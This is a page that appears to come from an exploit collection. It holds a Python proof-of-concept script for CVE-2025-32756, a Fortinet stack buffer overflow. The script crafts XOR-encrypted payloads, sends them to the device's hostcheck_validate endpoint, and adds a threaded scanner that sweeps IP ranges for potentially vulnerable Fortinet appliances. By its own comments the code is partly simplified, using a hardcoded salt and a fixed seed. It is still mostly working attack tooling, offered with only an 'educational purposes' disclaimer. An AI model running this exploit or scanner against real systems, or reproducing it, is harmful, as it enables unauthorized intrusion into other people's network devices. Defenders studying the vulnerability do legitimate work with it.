4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / fortinet_cve_2025_32756_poc.py PY
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-32756 - Fortinet Stack-Based Buffer Overflow
This script demonstrates the vulnerability by sending specially crafted HTTP requests
with malformed AuthHash values to potentially vulnerable Fortinet devices.

WARNING: This script is for educational purposes only. Use only on systems you own or have permission to test.

Author: Kn0x Researcher
Date: June 2025
"""

import requests
import argparse
import sys
import hashlib
import base64
import urllib.parse
import ssl
import time
import socket
import ipaddress
import concurrent.futures
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class FortinetExploit:
    def __init__(self, target, port=443, debug=False):
        self.target = target
        self.port = port
        self.debug = debug
        self.base_url = f"https://{target}:{port}"
        self.session = requests.Session()
        self.session.verify = False
        self.salt = None
        
    def log(self, message):
        if self.debug:
            print(f"[DEBUG] {message}")
            
    def error(self, message):
        print(f"[ERROR] {message}")
        sys.exit(1)
        
    def get_salt(self):
        """Retrieve the salt from the server"""
        try:
            response = self.session.get(f"{self.base_url}/remote/info", timeout=10)
            if response.status_code != 200:
                self.error(f"Failed to get salt. Status code: {response.status_code}")
                
            # Extract salt from response
            # In a real exploit, we'd parse the response properly
            self.salt = "e0b638ac"  # Example salt value
            self.log(f"Retrieved salt: {self.salt}")
            return self.salt
        except Exception as e:
            self.error(f"Error retrieving salt: {e}")
    
    def compute_md5_state(self, salt, seed):
        """Compute the initial MD5 state from salt and seed"""
        data = salt + seed + "GCC is the GNU Compiler Collection."
        return hashlib.md5(data.encode()).hexdigest()
    
    def compute_keystream(self, initial_state, length):
        """Generate keystream from initial state"""
        keystream = ""
        current = initial_state
        
        while len(keystream) < length:
            current = hashlib.md5(bytes.fromhex(current)).hexdigest()
            keystream += current
            
        return keystream[:length]
    
    def create_payload(self, seed, overflow_length):
        """Create an exploit payload with the given overflow length"""
        if not self.salt:
            self.get_salt()
            
        # Initial state calculation
        initial_state = self.compute_md5_state(self.salt, seed)
        self.log(f"Initial state: {initial_state}")
        
        # Create a payload that will cause buffer overflow
        # The format is: seed + encrypted_length + encrypted_data
        
        # For simplicity in this PoC, we're using a fixed pattern
        # In a real exploit, we'd craft this more carefully
        
        # Calculate the size that will trigger overflow
        # We need to encode a size that, when decrypted, will be larger than the buffer
        keystream_for_length = self.compute_keystream(initial_state, 32)[:4]
        
        # XOR the desired overflow length with the keystream to get encrypted length
        target_length = overflow_length
        enc_length_bytes = bytes([
            (target_length & 0xFF) ^ int(keystream_for_length[0:2], 16),
            ((target_length >> 8) & 0xFF) ^ int(keystream_for_length[2:4], 16)
        ])
        enc_length_hex = enc_length_bytes.hex()
        
        # Create payload data - in a real exploit this would be crafted to achieve RCE
        # Here we just use a pattern to demonstrate the overflow
        data = "A" * 64
        
        # Encrypt the data
        keystream_for_data = self.compute_keystream(initial_state, len(data) * 2)[6:]
        encrypted_data = ""
        for i in range(len(data)):
            encrypted_data += format(ord(data[i]) ^ int(keystream_for_data[i*2:i*2+2], 16), '02x')
        
        # Assemble the final payload
        payload = seed + enc_length_hex + encrypted_data
        
        self.log(f"Created payload with overflow length {overflow_length}")
        return payload
    
    def send_exploit(self, payload):
        """Send the exploit payload to the target"""
        try:
            url = f"{self.base_url}/remote/hostcheck_validate"
            enc_param = urllib.parse.quote(payload)
            
            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
                "Content-Type": "application/x-www-form-urlencoded"
            }
            
            self.log(f"Sending payload to {url}")
            response = self.session.post(
                url,
                data=f"enc={enc_param}",
                headers=headers,
                timeout=10
            )
            
            self.log(f"Response status: {response.status_code}")
            self.log(f"Response headers: {response.headers}")
            
            return response
        except Exception as e:
            self.error(f"Error sending exploit: {e}")
    
    def execute(self):
        """Execute the exploit"""
        print(f"[*] Targeting {self.target}:{self.port}")
        
        # Get salt from target
        self.get_salt()
        
        # Create a seed value - in a real exploit we'd calculate this more carefully
        seed = "00690000"
        
        print(f"[*] Using seed: {seed}")
        
        # First request - set a byte to NULL
        print("[*] Sending first payload to set up the overflow...")
        payload1 = self.create_payload(seed, 4999)
        self.send_exploit(payload1)
        
        # Small delay between requests
        time.sleep(1)
        
        # Second request - set a specific byte to a controlled value
        print("[*] Sending second payload to trigger the vulnerability...")
        payload2 = self.create_payload(seed, 5000)
        response = self.send_exploit(payload2)
        
        # Check for signs of successful exploitation
        if response.status_code == 200:
            print("[+] Exploit likely succeeded!")
            print("[+] A vulnerable system would have the target byte modified")
            print("[+] In a real attack, this could lead to remote code execution")
        else:
            print("[-] Exploit may have failed or target might not be vulnerable")

class FortinetScanner:
    def __init__(self, debug=False):
        self.debug = debug
        
    def log(self, message):
        if self.debug:
            print(f"[DEBUG] {message}")
            
    def is_port_open(self, ip, port, timeout=2):
        """Check if a port is open"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            result = sock.connect_ex((str(ip), port))
            sock.close()
            return result == 0
        except:
            return False
            
    def check_fortinet_device(self, ip, port=443):
        """Check if an IP address is a Fortinet device"""
        if not self.is_port_open(ip, port):
            return None
            
        try:
            url = f"https://{ip}:{port}"
            response = requests.get(
                url,
                timeout=5,
                verify=False,
                headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
            )
            
            # Check for Fortinet signatures in response
            if "Fortinet" in response.text or "FortiGate" in response.text or "FortiVoice" in response.text:
                # Try to determine product type
                product_type = "Unknown Fortinet Device"
                if "FortiVoice" in response.text:
                    product_type = "FortiVoice"
                elif "FortiMail" in response.text:
                    product_type = "FortiMail"
                elif "FortiNDR" in response.text:
                    product_type = "FortiNDR"
                elif "FortiRecorder" in response.text:
                    product_type = "FortiRecorder"
                elif "FortiCamera" in response.text:
                    product_type = "FortiCamera"
                
                # Check if potentially vulnerable to CVE-2025-32756
                is_vulnerable = self.check_vulnerability(ip, port)
                
                return {
                    "ip": str(ip),
                    "port": port,
                    "product": product_type,
                    "potentially_vulnerable": is_vulnerable
                }
        except Exception as e:
            self.log(f"Error checking {ip}: {e}")
            
        return None
        
    def check_vulnerability(self, ip, port=443):
        """Check if a device is potentially vulnerable to CVE-2025-32756"""
        try:
            url = f"https://{ip}:{port}/remote/hostcheck_validate"
            response = requests.get(
                url,
                timeout=5,
                verify=False,
                headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
            )
            
            # If the endpoint exists, the device might be vulnerable
            # This is a very basic check and not conclusive
            if response.status_code != 404:
                return True
                
        except Exception as e:
            self.log(f"Error checking vulnerability on {ip}: {e}")
            
        return False
        
    def scan_network(self, target_range, port=443, threads=10):
        """Scan a network range for vulnerable Fortinet devices"""
        try:
            network = ipaddress.ip_network(target_range)
            print(f"[*] Starting scan of {network} on port {port}")
            print(f"[*] Using {threads} threads")
            
            results = []
            total_ips = network.num_addresses
            scanned = 0
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in network}
                for future in concurrent.futures.as_completed(future_to_ip):
                    scanned += 1
                    if scanned % 10 == 0 or scanned == total_ips:
                        print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)")
                    
                    result = future.result()
                    if result:
                        print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
                        results.append(result)
            
            return results
            
        except Exception as e:
            print(f"[ERROR] Error scanning network: {e}")
            return []
    
    def scan_multiple_ips(self, ip_list, port=443, threads=10, output_file=None):
        """Scan multiple individual IPs for vulnerable Fortinet devices"""
        try:
            print(f"[*] Starting scan of {len(ip_list)} IPs on port {port}")
            print(f"[*] Using {threads} threads")
            
            results = []
            total_ips = len(ip_list)
            scanned = 0
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in ip_list}
                for future in concurrent.futures.as_completed(future_to_ip):
                    scanned += 1
                    if scanned % 10 == 0 or scanned == total_ips:
                        print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)")
                    
                    result = future.result()
                    if result:
                        print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
                        results.append(result)
            
            # Write results to output file if specified
            if output_file and results:
                try:
                    with open(output_file, 'w') as f:
                        f.write("IP,Port,Product,Vulnerable\n")
                        for result in results:
                            f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n")
                    print(f"[+] Results written to {output_file}")
                except Exception as e:
                    print(f"[ERROR] Failed to write to output file: {e}")
            
            return results
            
        except Exception as e:
            print(f"[ERROR] Error scanning IPs: {e}")
            return []

def load_ips_from_file(filename):
    """Load IP addresses from a text file"""
    try:
        with open(filename, 'r') as f:
            ips = [line.strip() for line in f if line.strip()]
        print(f"[*] Loaded {len(ips)} IP addresses from {filename}")
        return ips
    except Exception as e:
        print(f"[ERROR] Failed to load IP addresses from {filename}: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="CVE-2025-32756 Fortinet Buffer Overflow PoC")
    subparsers = parser.add_subparsers(dest="command", help="Command to run")
    
    # Exploit command
    exploit_parser = subparsers.add_parser("exploit", help="Exploit a single target")
    exploit_parser.add_argument("target", help="Target IP or hostname")
    exploit_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
    exploit_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")
    
    # Scan command
    scan_parser = subparsers.add_parser("scan", help="Scan for vulnerable devices")
    scan_group = scan_parser.add_mutually_exclusive_group(required=True)
    scan_group.add_argument("-f", "--ip", help="Single IP to scan")
    scan_group.add_argument("-u", "--file", help="File containing list of IPs to scan (one per line)")
    scan_group.add_argument("--range", help="IP range to scan (CIDR notation, e.g., 192.168.1.0/24)")
    scan_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)")
    scan_parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads (default: 10)")
    scan_parser.add_argument("-o", "--output", help="Output file to save results (CSV format)")
    scan_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output")
    
    args = parser.parse_args()
    
    print("CVE-2025-32756 Fortinet Buffer Overflow PoC")
    print("WARNING: This is for educational purposes only!")
    print("Use only against systems you own or have permission to test.")
    print("=" * 60)
    
    if args.command == "exploit":
        exploit = FortinetExploit(args.target, args.port, args.debug)
        exploit.execute()
    elif args.command == "scan":
        scanner = FortinetScanner(args.debug)
        
        if args.ip:
            # Scan a single IP
            print(f"[*] Scanning single IP: {args.ip}")
            result = scanner.check_fortinet_device(args.ip, args.port)
            if result:
                print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}")
                if args.output:
                    try:
                        with open(args.output, 'w') as f:
                            f.write("IP,Port,Product,Vulnerable\n")
                            f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n")
                        print(f"[+] Results written to {args.output}")
                    except Exception as e:
                        print(f"[ERROR] Failed to write to output file: {e}")
            else:
                print(f"[-] No Fortinet device found at {args.ip}:{args.port} or it's not vulnerable")
        
        elif args.file:
            # Scan multiple IPs from file
            ip_list = load_ips_from_file(args.file)
            scanner.scan_multiple_ips(ip_list, args.port, args.threads, args.output)
        
        elif args.range:
            # Scan IP range (CIDR)
            results = scanner.scan_network(args.range, args.port, args.threads)
            if args.output and results:
                try:
                    with open(args.output, 'w') as f:
                        f.write("IP,Port,Product,Vulnerable\n")
                        for result in results:
                            f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n")
                    print(f"[+] Results written to {args.output}")
                except Exception as e:
                    print(f"[ERROR] Failed to write to output file: {e}")
    else:
        parser.print_help()

if __name__ == "__main__":
    main()